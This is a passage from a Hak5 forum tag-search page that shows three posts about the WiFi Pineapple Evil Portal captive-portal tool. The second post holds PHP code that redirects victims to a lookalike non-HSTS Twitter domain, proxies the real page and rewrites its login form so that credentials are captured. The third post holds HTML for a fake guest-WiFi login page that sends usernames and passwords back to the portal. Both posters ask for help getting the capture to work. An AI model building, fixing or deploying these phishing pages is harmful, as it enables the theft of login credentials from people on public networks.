Jump to content

Search the Community

Showing results for tags 'newbi3'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 3 results

  1. Evil Portal is a UI front end for nodogsplash on the 3.x.x firmware. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live). Here's some media: This video goes along with a tutorial I made: click here
  2. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  3. I'd love to release this to the Community.. as soon as I get it fixed ;) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>White Pirate WiFi</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { background-image: images/wallpaper-2551827.png); background-repeat: no-repeat; } </style> </head> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value) var passwordvalue=encodeURIComponent(document.getElementById("password").value) var parameters="username="+usernamevalue+"&password="+passwordvalue xmlhttp.open("POST", "", true) xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded") xmlhttp.send(parameters) } </script> <body text="#FFFFFF" link="#FF0004" vlink="#FF0004" alink="#FF0004"> <center> <br /> <img src="images/Wi-Fi-Alliance.png" alt="" width="200" height="128"><br /> <br /> <p><Strong>Welcome to 'White Pirate' Guest WiFi</Strong></p> <p><br /> </p> <form action="capture" method="post"> <fieldset> <p><strong>Please login using any of the following.</strong></p> <table width="500"> <tr> <td width="20%" colspan="1" align=left>Email</td> <td colspan="3"><input name="username" type="text" id="username" /></td> </tr> <tr> <td colspan="1" align=left>Password</td> <td colspan="3"><input type="password" name="password" id="password" /></td> </tr> <tr> <td><blockquote> <p><img src="images/social-facebook-box-white-icon.png" width="49" height="49" /></p> </blockquote></td> <td width="19%"><blockquote> <p><img src="images/social-yahoo-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="20%"><blockquote> <p><img src="images/social-twitter-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="41%"><blockquote> <p><img src="images/social-google-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> </tr> </table> </fieldset> </form> <p><br /> </p> <form method="POST" action=""> <button type="button" onclick="sendInfo();return false;">Submit</button> </form> </p> </center> </body> </html My issue is just with the button.. making sure it goes to the correct page the user is trying to go to.
  • Create New...